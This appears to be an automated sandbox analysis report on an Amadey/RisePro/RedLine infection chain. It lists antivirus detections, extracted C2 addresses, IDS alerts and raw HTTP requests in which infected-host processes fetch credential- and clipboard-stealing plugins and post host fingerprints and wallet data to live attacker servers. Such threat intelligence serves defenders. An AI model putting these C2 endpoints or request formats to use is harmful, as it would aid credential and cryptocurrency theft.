                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe, Avira: detection malicious, Label: TR/AutoIt.zstul
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll, Avira: detection malicious, Label: TR/PSW.Agent.szlsq
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exe, Avira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll, Avira: detection malicious, Label: TR/ClipBanker.tbxxw
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe, Avira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Avira: detection malicious, Label: HEUR/AGEN.1305500
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll, Avira: detection malicious, Label: TR/PSW.Agent.szlsq
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll, Avira: detection malicious, Label: TR/ClipBanker.pjgxt
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe, Avira: detection malicious, Label: TR/AutoIt.zstul
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe, Avira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: 52.0.build12.exe.3c0000.0.unpack, Malware Configuration Extractor: RedLine {"C2 url": ["b-stamps.gl.at.ply.gg:30946"], "Bot Id": "Traffic"}
                              Source: rundll32.exe.3356.8.memstrmin, Malware Configuration Extractor: Amadey {"C2 url": ["http://193.233.132.56/Pneh2sXQk0/index.php"]}
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exe, Virustotal: Detection: 50%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll, ReversingLabs: Detection: 95%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll, Virustotal: Detection: 81%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe, Virustotal: Detection: 32%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, Virustotal: Detection: 77%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll, ReversingLabs: Detection: 81%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll, Virustotal: Detection: 80%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll, ReversingLabs: Detection: 91%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll, Virustotal: Detection: 80%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exe, Virustotal: Detection: 40%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe, Virustotal: Detection: 50%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exe, Virustotal: Detection: 42%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll, ReversingLabs: Detection: 71%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll, Virustotal: Detection: 78%
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe, Virustotal: Detection: 50%
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe, ReversingLabs: Detection: 50%
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe, Virustotal: Detection: 54%
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe, Virustotal: Detection: 42%
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe, Virustotal: Detection: 32%
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe, Virustotal: Detection: 50%
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Virustotal: Detection: 77%
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe, Virustotal: Detection: 77%
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe, Virustotal: Detection: 42%
                              Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, ReversingLabs: Detection: 81%
                              Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Virustotal: Detection: 80%
                              Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, ReversingLabs: Detection: 71%
                              Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Virustotal: Detection: 78%
                              Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, ReversingLabs: Detection: 95%
                              Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Virustotal: Detection: 81%
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, Virustotal: Detection: 54%
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, ReversingLabs: Detection: 50%
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe, Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe, Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exe, Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe, Joe Sandbox ML: detected
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exe, Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe, Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe, Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe, Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exe, Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe, Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe, Joe Sandbox ML: detected
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, Joe Sandbox ML: detected
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: unknown, HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49709 version: TLS 1.0
                              Source: unknown, HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49705 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49712 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49766 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49767 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49776 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49777 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49780 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49782 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49801 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49806 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49811 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49813 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49825 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49827 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49840 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49874 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49878 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49923 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49925 version: TLS 1.2
                              Source: unknown, HTTPS traffic detected: 20.189.173.25:443 -> 192.168.2.5:50555 version: TLS 1.2
                              Source: C:\Windows\System32\rundll32.exe, File opened: C:\Users\user\Videos\desktop.ini
                              Source: C:\Windows\System32\rundll32.exe, File opened: C:\Users\user
                              Source: C:\Windows\System32\rundll32.exe, File opened: C:\Users\user\AppData
                              Source: C:\Windows\System32\rundll32.exe, File opened: C:\Users\user\Music\desktop.ini
                              Source: C:\Windows\System32\rundll32.exe, File opened: C:\Users\user\OneDrive\desktop.ini
                              Source: C:\Windows\System32\rundll32.exe, File opened: C:\Users\user\AppData\Local

                              Networking

                              Source: Traffic, Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.5:49713 -> 193.233.132.56:80
                              Source: Traffic, Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 193.233.132.56:80 -> 192.168.2.5:49713
                              Source: Traffic, Snort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.5:49717 -> 193.233.132.56:80
                              Source: Traffic, Snort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.5:49718 -> 193.233.132.56:80
                              Source: Traffic, Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49719 -> 193.233.132.56:80
                              Source: Traffic, Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49721 -> 193.233.132.56:80
                              Source: Traffic, Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49741 -> 193.233.132.56:80
                              Source: Traffic, Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.5:49762 -> 147.45.47.93:58709
                              Source: Traffic, Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49762
                              Source: Traffic, Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 147.45.47.93:58709 -> 192.168.2.5:49762
                              Source: Traffic, Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49768 -> 193.233.132.56:80
                              Source: Traffic, Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49773
                              Source: Traffic, Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49774
                              Source: Traffic, Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 147.45.47.93:58709 -> 192.168.2.5:49773
                              Source: Traffic, Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 147.45.47.93:58709 -> 192.168.2.5:49774
                              Source: Traffic, Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49762 -> 147.45.47.93:58709
                              Source: Traffic, Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49773 -> 147.45.47.93:58709
                              Source: Traffic, Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49774 -> 147.45.47.93:58709
                              Source: Traffic, Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49809
                              Source: Traffic, Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49822
                              Source: Traffic, Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49870
                              Source: Traffic, Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 193.233.132.167:80 -> 192.168.2.5:49869
                              Source: Traffic, Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49880 -> 193.233.132.167:80
                              Source: Traffic, Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.5:49886 -> 193.233.132.167:80
                              Source: Traffic, Snort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.5:49890 -> 193.233.132.167:80
                              Source: Traffic, Snort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.5:49892 -> 193.233.132.167:80
                              Source: Traffic, Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 147.45.47.93:58709 -> 192.168.2.5:49918
                              Source: Traffic, Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.5:50734 -> 193.233.132.167:80
                              Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 193.233.132.56 80
                              Source: C:\Windows\System32\rundll32.exe, Network Connect: 193.233.132.167 80
                              Source: Malware configuration extractor, IPs: 193.233.132.56
                              Source: Malware configuration extractor, URLs: b-stamps.gl.at.ply.gg:30946
                              Source: global traffic, TCP traffic: 147.45.47.93 ports 0,5,7,8,58709,9
                              Source: global traffic, TCP traffic: 147.185.221.19 ports 0,3,4,6,9,30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49883
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49889
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49883
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49889
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49889
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49883
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49998
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49997
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49998
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49997
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50461 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50461 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50095
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50095
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50095
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50095
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50095
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50461
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50462
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50461
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50462
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50461
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50462
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50785 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50785 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50784
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50785
                              Source: global traffic, TCP traffic: 192.168.2.5:49762 -> 147.45.47.93:58709
                              Source: global traffic, TCP traffic: 192.168.2.5:49883 -> 147.185.221.19:30946
                              Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.18.0 (Ubuntu); Date: Fri, 19 Apr 2024 01:29:03 GMT; Content-Type: application/octet-stream; Content-Length: 1285632; Last-Modified: Sun, 03 Mar 2024 11:54:33 GMT; Connection: keep-alive; ETag: "65e464f9-139e00"; Accept-Ranges: bytes
                              Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.18.0 (Ubuntu); Date: Fri, 19 Apr 2024 01:29:04 GMT; Content-Type: application/octet-stream; Content-Length: 1905152; Last-Modified: Fri, 19 Apr 2024 00:37:12 GMT; Connection: keep-alive; ETag: "6621bcb8-1d1200"; Accept-Ranges: bytes
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:06 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Sun, 03 Mar 2024 11:54:32 GMTConnection: keep-aliveETag: "65e464f8-1b600"Accept-Ranges: bytes
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:12 GMTContent-Type: application/octet-streamContent-Length: 1166336Last-Modified: Fri, 19 Apr 2024 00:36:20 GMTConnection: keep-aliveETag: "6621bc84-11cc00"Accept-Ranges: bytes
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:16 GMTContent-Type: application/octet-streamContent-Length: 2295808Last-Modified: Fri, 19 Apr 2024 00:36:37 GMTConnection: keep-aliveETag: "6621bc95-230800"Accept-Ranges: bytes
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:29:22 GMTContent-Type: application/octet-streamContent-Length: 2310656Last-Modified: Fri, 19 Apr 2024 00:36:46 GMTConnection: keep-aliveETag: "6621bc9e-234200"Accept-Ranges: bytes
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:30:04 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Thu, 01 Feb 2024 16:00:36 GMTConnection: keep-aliveETag: "65bbc024-139e00"Accept-Ranges: bytes
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:30:04 GMTContent-Type: application/octet-streamContent-Length: 97792Last-Modified: Fri, 19 Apr 2024 00:20:52 GMTConnection: keep-aliveETag: "6621b8e4-17e00"Accept-Ranges: bytes
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:30:07 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Thu, 01 Feb 2024 16:00:35 GMTConnection: keep-aliveETag: "65bbc023-1b600"Accept-Ranges: bytes
                              Source: global trafficHTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1713490393138Host: self.events.data.microsoft.comContent-Length: 7974Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: GET /mine/amert.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000054001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000055001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NDYyMQ==Host: 193.233.132.56Content-Length: 4781Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000056001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /cost/sarra.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 37 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000057031&unit=246122658369
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
